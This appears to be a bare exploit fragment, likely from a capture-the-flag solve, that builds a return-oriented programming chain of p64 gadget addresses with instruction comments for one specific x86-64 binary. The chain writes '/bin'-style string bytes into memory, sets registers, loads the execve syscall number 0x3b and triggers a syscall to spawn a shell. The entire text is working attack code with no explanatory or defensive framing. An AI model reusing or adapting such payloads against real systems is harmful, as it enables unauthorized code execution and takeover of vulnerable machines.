payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x4290ad)+p64(0x40a22c)
# 0x000000000040a22c: pop rbx; ret; 
payload += p64(0x6e69622f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4290b1)+p64(0x40a22c)
# 0x000000000040a22c: pop rbx; ret; 
payload += p64(0x68662f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x0)+p64(0x40a22c)
# 0x000000000040a22c: pop rbx; ret; 
payload += p64(0x4017d1)+p64(0x411eba)
# 0x0000000000411eba: mov edx, edi; call rbx; 
payload += b''
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x429070)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x40b4cd)
# 0x000000000040b4cd: xchg eax, ebp; ret; 
payload += p64(0x40892e)
# 0x000000000040892e: syscall; 
payload += b''
